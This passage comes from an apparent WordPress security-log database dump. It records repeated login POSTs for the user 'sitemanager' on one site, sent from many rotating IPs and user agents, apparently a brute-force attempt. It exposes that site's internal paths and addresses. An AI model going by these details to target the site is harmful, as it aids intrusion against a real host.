00:00:00'),(94539,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35282\";s:11:\"REMOTE_ADDR\";s:12:\"209.74.67.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746014119.827677;s:12:\"REQUEST_TIME\";i:1746014119;}}','209.74.67.29',0,'2025-04-30 17:25:21','1970-01-01 00:00:00'),(94540,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57494\";s:11:\"REMOTE_ADDR\";s:13:\"142.44.138.99\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746014502.4933691;s:12:\"REQUEST_TIME\";i:1746014502;}}','142.44.138.99',0,'2025-04-30 17:31:44','1970-01-01 00:00:00'),(94541,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32366\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746014886.6539459;s:12:\"REQUEST_TIME\";i:1746014886;}}','91.151.95.70',0,'2025-04-30 17:38:08','1970-01-01 00:00:00'),(94542,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42594\";s:11:\"REMOTE_ADDR\";s:13:\"108.181.92.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746015266.2766249;s:12:\"REQUEST_TIME\";i:1746015266;}}','108.181.92.67',0,'2025-04-30 17:44:28','1970-01-01 00:00:00'),(94543,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50036\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.48.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746015648.2194819;s:12:\"REQUEST_TIME\";i:1746015648;}}','54.39.48.216',0,'2025-04-30 17:50:50','1970-01-01 00:00:00'),(94544,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39904\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746016033.17396;s:12:\"REQUEST_TIME\";i:1746016033;}}','162.0.229.109',0,'2025-04-30 17:57:15','1970-01-01 00:00:00'),(94545,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55608\";s:11:\"REMOTE_ADDR\";s:14:\"95.217.147.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746016415.1814561;s:12:\"REQUEST_TIME\";i:1746016415;}}','95.217.147.111',0,'2025-04-30 18:03:36','1970-01-01 00:00:00'),(94546,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45540\";s:11:\"REMOTE_ADDR\";s:10:\"38.57.3.35\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746016794.692292;s:12:\"REQUEST_TIME\";i:1746016794;}}','38.57.3.35',0,'2025-04-30 18:09:56','1970-01-01 00:00:00'),(94547,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35150\";s:11:\"REMOTE_ADDR\";s:14:\"199.188.207.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746017176.7924571;s:12:\"REQUEST_TIME\";i:1746017176;}}','199.188.207.22',0,'2025-04-30 18:16:18','1970-01-01 00:00:00'),(94548,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59174\";s:11:\"REMOTE_ADDR\";s:13:\"185.179.24.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746017558.091722;s:12:\"REQUEST_TIME\";i:1746017558;}}','185.179.24.14',0,'2025-04-30 18:22:40','1970-01-01 00:00:00'),(94549,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55422\";s:11:\"REMOTE_ADDR\";s:13:\"104.219.248.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\